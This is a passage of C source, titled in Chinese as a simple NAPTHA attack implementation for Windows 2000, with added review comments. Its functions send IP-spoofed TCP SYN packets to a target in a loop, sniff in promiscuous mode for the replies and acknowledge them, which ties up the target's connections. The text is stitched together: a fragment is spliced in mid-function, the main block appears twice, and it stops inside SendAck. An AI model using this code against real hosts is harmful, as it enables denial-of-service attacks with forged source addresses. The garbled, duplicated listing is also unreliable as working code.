NAPTHA攻击方式在2K下的简单实现
lpPacket,
TRUE)==FALSE)
{
printf("Error sending the packets!\n");
return 0;
}
Sleep(30000);
}
PacketFreePacket(lpPacket);
PacketCloseAdapter(lpAdapter);
return 0;
}
/*
 * Thread entry point that emits hand-built TCP SYN segments in an endless loop.
 *
 * Opens a raw IPv4 socket with IP_HDRINCL, fills in the IP and TCP headers
 * itself and sends them to ATIP:ATPORT. The IP source field is taken from
 * SNOOPIP, not from the local stack, and the TCP source port is derived from
 * GetTickCount() on every pass. ATIP, ATPORT, SNOOPIP and SLEEPTIME are
 * defined outside this listing.
 *
 * Values that stay constant in every segment this function sends, and are
 * therefore usable as a traffic signature when reviewing captures:
 * TTL 123, TCP window 512, TCP sequence number 0x12345678, flags 0x02
 * (SYN only), IP ident set to 1.
 *
 * lp is not used. Returns 0 (or `false`, which is also 0) on any failure.
 *
 * NOTE(review): every early return after socket() succeeds leaves the socket
 * open and skips WSACleanup(); the closesocket()/WSACleanup() calls after the
 * loop are unreachable because while(TRUE) is only left via return.
 * NOTE(review): the function is declared DWORD but returns `false` on some
 * paths; the callers' handling of the value is not visible here.
 */
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int SourcePort;
// Staging buffer shared by the checksum input and the outgoing datagram.
// NOTE(review): assumes both pseudo-header+TCP and IP+TCP fit in 60 bytes;
// the struct definitions are not visible here - confirm.
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!\n");
return 0;
}
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return 0;
}
// IP_HDRINCL: the application supplies the IP header, including the source address.
flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return false;
}
nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR) // set the send timeout
{
printf("setsockopt SO_SNDTIMEO error!\n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
// Version 4 in the high nibble, header length in 32-bit words in the low nibble.
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); // total IP length
// NOTE(review): stored without htons(); if ident is a 16-bit field the on-wire
// value on a little-endian host reads as 0x0100 - confirm against IPHEADER.
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
// Left at 0; nothing in this function computes the IP header checksum.
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=0;
// Data offset (header length in 32-bit words) in the high nibble, reserved bits 0.
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
// 2 == SYN flag only.
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
// Fixed initial sequence number; AnalyseData() matches replies on this value + 1.
tcpHeader.th_seq=htonl(0x12345678);
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
// Source address written into the IP header comes from SNOOPIP.
ipHeader.sourceIP=inet_addr(SNOOPIP);
while(TRUE)
{
SourcePort=GetTickCount()%65534;
tcpHeader.th_sport=htons(SourcePort);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
// Stage pseudo-header + TCP header so the TCP checksum can be computed over them.
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
// Overwrite the staging buffer with what is actually sent: IP header + TCP header.
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else printf("send ok!\n");
// Pause between segments; SLEEPTIME is defined outside this listing.
Sleep(SLEEPTIME);
}//endwhile
// Unreachable: the loop above has no break.
closesocket(sock);
WSACleanup();
return 0;
}
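/*
 * Computes the 16-bit one's-complement checksum used by IP and TCP headers.
 *
 * buffer: start of the data, read as a sequence of 16-bit words.
 * size:   number of bytes to cover; values <= 0 are treated as empty input.
 *
 * Returns the complement of the folded 32-bit sum, truncated to 16 bits.
 * An odd trailing byte is added as-is (no padding byte is read).
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;

    /* Sum all complete 16-bit words. */
    while (size > 1) {
        cksum += *buffer++;
        size -= (int)sizeof(USHORT);
    }

    /*
     * Exactly one byte left over. The original tested `if (size)`, which was
     * also true for a negative size and then read one byte from a buffer the
     * caller had declared empty.
     */
    if (size == 1) {
        cksum += *(UCHAR *)buffer;
    }

    /* Fold the carries back into the low 16 bits, twice to absorb a new carry. */
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}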
/*
 * Thread entry point that captures frames on a user-selected adapter and hands
 * each received packet buffer to AnalyseData().
 *
 * Steps: list the adapters with PacketGetAdapterNames(), print them, read the
 * chosen number from stdin, open that adapter, request promiscuous mode, set a
 * 10 KB driver buffer, then loop forever receiving into a local buffer.
 *
 * lp is not used. Returns 0 on most failures and -1 when PacketSetBuff() fails.
 *
 * NOTE(review): memory-safety problems visible in this block:
 *  - the name-splitting loop reads *(temp-1) while temp still points at
 *    AdapterName[0] if the first character is '\0';
 *  - i is never checked against the 10 rows of AdapterList, and the copied
 *    length is never checked against the 1024-byte row size;
 *  - scanf() is unchecked and an input of 0 passes the `i>AdapterNum` test,
 *    after which AdapterList[i-1] indexes with a wrapped-around ULONG.
 * NOTE(review): the adapter handle is never closed; the receive loop has no
 * exit, so the final `return 0` is unreachable.
 */
DWORD WINAPI SnifferSynAck(LPVOID lp)
{
LPADAPTER lpAdapter;
static CHAR AdapterList[10][1024];
ULONG AdapterNum;
WCHAR AdapterName[2048];
WCHAR *temp,*temp1;
// Passed as the buffer length although AdapterName is WCHAR[2048].
ULONG AdapterLength=1024;
// adapter_num is never used in this function.
ULONG i,adapter_num=0;
if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
{
printf("Unable to retrieve the list of the adapters!\n");
return 0;
}
temp = AdapterName;
temp1=AdapterName;
i = 0;
// Split the returned list on '\0'; two consecutive '\0' end the list.
while ((*temp != '\0')||(*(temp-1) != '\0'))
{
if (*temp == '\0')
{
memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
temp1=temp+1;
i++;
}
temp++;
}
AdapterNum = i;
for (i = 0; i < AdapterNum; i++)
wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
printf("\nPlease select adapter number:");
scanf("%d",&i);
// Only the upper bound is checked; 0 is not rejected.
if(i>AdapterNum)
{
printf("\nInput Number error!");
return 0;
}
// IsGoOn is defined outside this listing.
IsGoOn = TRUE;
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[i-1]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return 0;
}
// Put the adapter into promiscuous mode; failure only prints a warning.
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous mode\n");
}
if(PacketSetBuff(lpAdapter,1024*10)==FALSE)
{
printf("PacketSetBuff Error: %d\n",GetLastError());
return -1;
}
while ( 1 )
{
TCHAR Buffer[1024*10]={0};
LPPACKET lpPacket;
// NOTE(review): the results of PacketAllocatePacket() and
// PacketReceivePacket() are not checked before the packet is parsed.
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,Buffer,sizeof(Buffer));
PacketReceivePacket(lpAdapter,lpPacket,TRUE);
AnalyseData( lpPacket );
PacketFreePacket(lpPacket);
}
return 0;
}
/*
 * Inspects the start of a captured packet buffer and calls SendAck() when it
 * holds a TCP SYN/ACK answering the fixed sequence number used by
 * ThreadSynFlood().
 *
 * A frame is accepted when its Ethernet type is 0x0800 (IPv4), its destination
 * MAC equals SMacAddr (defined outside this listing), the TCP flags are
 * exactly 0x12 (SYN|ACK) and the acknowledgement number is 0x12345678 + 1.
 *
 * NOTE(review): no length from the capture header is checked before the
 * Ethernet and TCP headers are read, so a short capture is parsed as-is.
 * NOTE(review): the TCP header offset is fixed at sizeof(IPHEADER) and the IP
 * protocol field is never examined - confirm this is intended.
 */
void AnalyseData (LPPACKET lpPacket)
{
char *Buf;
EHHEADR *lpEthdr;
bpf_hdr *lpBpfhdr;
Buf=(char *)lpPacket->Buffer;
// The buffer starts with a bpf_hdr; bh_hdrlen is the offset of the frame itself.
lpBpfhdr=(bpf_hdr *)Buf;
lpEthdr=(EHHEADR *)(Buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800) && (!memcmp(lpEthdr->eh_dst,SMacAddr,6)) )
{
TCPHEADER *lpTcphdr;
lpTcphdr=(TCPHEADER *)(Buf+lpBpfhdr->bh_hdrlen+sizeof(EHHEADR)+sizeof(IPHEADER));
// th_ack is compared in network byte order against the fixed ISN + 1.
if ( lpTcphdr->th_ack == ntohl(0x12345678+1) && lpTcphdr->th_flag == 0x12)
{
// Fields are passed on exactly as read from the frame (still in network byte order).
SendAck(lpTcphdr->th_seq,lpTcphdr->th_ack,lpTcphdr->th_dport);
}
}
}
void SendAck ( DWORD SEQ , DWORD ACK ,USHORT SPort)
{
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
{
printf("Error sending the packets!\n");
return 0;
}
Sleep(30000);
}
PacketFreePacket(lpPacket);
PacketCloseAdapter(lpAdapter);
return 0;
}
/*
 * Thread entry point that emits hand-built TCP SYN segments in an endless loop.
 *
 * Opens a raw IPv4 socket with IP_HDRINCL, fills in the IP and TCP headers
 * itself and sends them to ATIP:ATPORT. The IP source field is taken from
 * SNOOPIP, not from the local stack, and the TCP source port is derived from
 * GetTickCount() on every pass. ATIP, ATPORT, SNOOPIP and SLEEPTIME are
 * defined outside this listing.
 *
 * Values that stay constant in every segment this function sends, and are
 * therefore usable as a traffic signature when reviewing captures:
 * TTL 123, TCP window 512, TCP sequence number 0x12345678, flags 0x02
 * (SYN only), IP ident set to 1.
 *
 * lp is not used. Returns 0 (or `false`, which is also 0) on any failure.
 *
 * NOTE(review): every early return after socket() succeeds leaves the socket
 * open and skips WSACleanup(); the closesocket()/WSACleanup() calls after the
 * loop are unreachable because while(TRUE) is only left via return.
 * NOTE(review): the function is declared DWORD but returns `false` on some
 * paths; the callers' handling of the value is not visible here.
 */
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int SourcePort;
// Staging buffer shared by the checksum input and the outgoing datagram.
// NOTE(review): assumes both pseudo-header+TCP and IP+TCP fit in 60 bytes;
// the struct definitions are not visible here - confirm.
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!\n");
return 0;
}
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return 0;
}
// IP_HDRINCL: the application supplies the IP header, including the source address.
flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return false;
}
nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR) // set the send timeout
{
printf("setsockopt SO_SNDTIMEO error!\n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
// Version 4 in the high nibble, header length in 32-bit words in the low nibble.
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); // total IP length
// NOTE(review): stored without htons(); if ident is a 16-bit field the on-wire
// value on a little-endian host reads as 0x0100 - confirm against IPHEADER.
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
// Left at 0; nothing in this function computes the IP header checksum.
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=0;
// Data offset (header length in 32-bit words) in the high nibble, reserved bits 0.
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
// 2 == SYN flag only.
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
// Fixed initial sequence number; AnalyseData() matches replies on this value + 1.
tcpHeader.th_seq=htonl(0x12345678);
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
// Source address written into the IP header comes from SNOOPIP.
ipHeader.sourceIP=inet_addr(SNOOPIP);
while(TRUE)
{
SourcePort=GetTickCount()%65534;
tcpHeader.th_sport=htons(SourcePort);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
// Stage pseudo-header + TCP header so the TCP checksum can be computed over them.
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
// Overwrite the staging buffer with what is actually sent: IP header + TCP header.
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else printf("send ok!\n");
// Pause between segments; SLEEPTIME is defined outside this listing.
Sleep(SLEEPTIME);
}//endwhile
// Unreachable: the loop above has no break.
closesocket(sock);
WSACleanup();
return 0;
}
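/*
 * Computes the 16-bit one's-complement checksum used by IP and TCP headers.
 *
 * buffer: start of the data, read as a sequence of 16-bit words.
 * size:   number of bytes to cover; values <= 0 are treated as empty input.
 *
 * Returns the complement of the folded 32-bit sum, truncated to 16 bits.
 * An odd trailing byte is added as-is (no padding byte is read).
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;

    /* Sum all complete 16-bit words. */
    while (size > 1) {
        cksum += *buffer++;
        size -= (int)sizeof(USHORT);
    }

    /*
     * Exactly one byte left over. The original tested `if (size)`, which was
     * also true for a negative size and then read one byte from a buffer the
     * caller had declared empty.
     */
    if (size == 1) {
        cksum += *(UCHAR *)buffer;
    }

    /* Fold the carries back into the low 16 bits, twice to absorb a new carry. */
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}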
/*
 * Thread entry point that captures frames on a user-selected adapter and hands
 * each received packet buffer to AnalyseData().
 *
 * Steps: list the adapters with PacketGetAdapterNames(), print them, read the
 * chosen number from stdin, open that adapter, request promiscuous mode, set a
 * 10 KB driver buffer, then loop forever receiving into a local buffer.
 *
 * lp is not used. Returns 0 on most failures and -1 when PacketSetBuff() fails.
 *
 * NOTE(review): memory-safety problems visible in this block:
 *  - the name-splitting loop reads *(temp-1) while temp still points at
 *    AdapterName[0] if the first character is '\0';
 *  - i is never checked against the 10 rows of AdapterList, and the copied
 *    length is never checked against the 1024-byte row size;
 *  - scanf() is unchecked and an input of 0 passes the `i>AdapterNum` test,
 *    after which AdapterList[i-1] indexes with a wrapped-around ULONG.
 * NOTE(review): the adapter handle is never closed; the receive loop has no
 * exit, so the final `return 0` is unreachable.
 */
DWORD WINAPI SnifferSynAck(LPVOID lp)
{
LPADAPTER lpAdapter;
static CHAR AdapterList[10][1024];
ULONG AdapterNum;
WCHAR AdapterName[2048];
WCHAR *temp,*temp1;
// Passed as the buffer length although AdapterName is WCHAR[2048].
ULONG AdapterLength=1024;
// adapter_num is never used in this function.
ULONG i,adapter_num=0;
if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
{
printf("Unable to retrieve the list of the adapters!\n");
return 0;
}
temp = AdapterName;
temp1=AdapterName;
i = 0;
// Split the returned list on '\0'; two consecutive '\0' end the list.
while ((*temp != '\0')||(*(temp-1) != '\0'))
{
if (*temp == '\0')
{
memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
temp1=temp+1;
i++;
}
temp++;
}
AdapterNum = i;
for (i = 0; i < AdapterNum; i++)
wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
printf("\nPlease select adapter number:");
scanf("%d",&i);
// Only the upper bound is checked; 0 is not rejected.
if(i>AdapterNum)
{
printf("\nInput Number error!");
return 0;
}
// IsGoOn is defined outside this listing.
IsGoOn = TRUE;
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[i-1]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return 0;
}
// Put the adapter into promiscuous mode; failure only prints a warning.
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous mode\n");
}
if(PacketSetBuff(lpAdapter,1024*10)==FALSE)
{
printf("PacketSetBuff Error: %d\n",GetLastError());
return -1;
}
while ( 1 )
{
TCHAR Buffer[1024*10]={0};
LPPACKET lpPacket;
// NOTE(review): the results of PacketAllocatePacket() and
// PacketReceivePacket() are not checked before the packet is parsed.
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,Buffer,sizeof(Buffer));
PacketReceivePacket(lpAdapter,lpPacket,TRUE);
AnalyseData( lpPacket );
PacketFreePacket(lpPacket);
}
return 0;
}
/*
 * Inspects the start of a captured packet buffer and calls SendAck() when it
 * holds a TCP SYN/ACK answering the fixed sequence number used by
 * ThreadSynFlood().
 *
 * A frame is accepted when its Ethernet type is 0x0800 (IPv4), its destination
 * MAC equals SMacAddr (defined outside this listing), the TCP flags are
 * exactly 0x12 (SYN|ACK) and the acknowledgement number is 0x12345678 + 1.
 *
 * NOTE(review): no length from the capture header is checked before the
 * Ethernet and TCP headers are read, so a short capture is parsed as-is.
 * NOTE(review): the TCP header offset is fixed at sizeof(IPHEADER) and the IP
 * protocol field is never examined - confirm this is intended.
 */
void AnalyseData (LPPACKET lpPacket)
{
char *Buf;
EHHEADR *lpEthdr;
bpf_hdr *lpBpfhdr;
Buf=(char *)lpPacket->Buffer;
// The buffer starts with a bpf_hdr; bh_hdrlen is the offset of the frame itself.
lpBpfhdr=(bpf_hdr *)Buf;
lpEthdr=(EHHEADR *)(Buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800) && (!memcmp(lpEthdr->eh_dst,SMacAddr,6)) )
{
TCPHEADER *lpTcphdr;
lpTcphdr=(TCPHEADER *)(Buf+lpBpfhdr->bh_hdrlen+sizeof(EHHEADR)+sizeof(IPHEADER));
// th_ack is compared in network byte order against the fixed ISN + 1.
if ( lpTcphdr->th_ack == ntohl(0x12345678+1) && lpTcphdr->th_flag == 0x12)
{
// Fields are passed on exactly as read from the frame (still in network byte order).
SendAck(lpTcphdr->th_seq,lpTcphdr->th_ack,lpTcphdr->th_dport);
}
}
}
void SendAck ( DWORD SEQ , DWORD ACK ,USHORT SPort)
{
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{

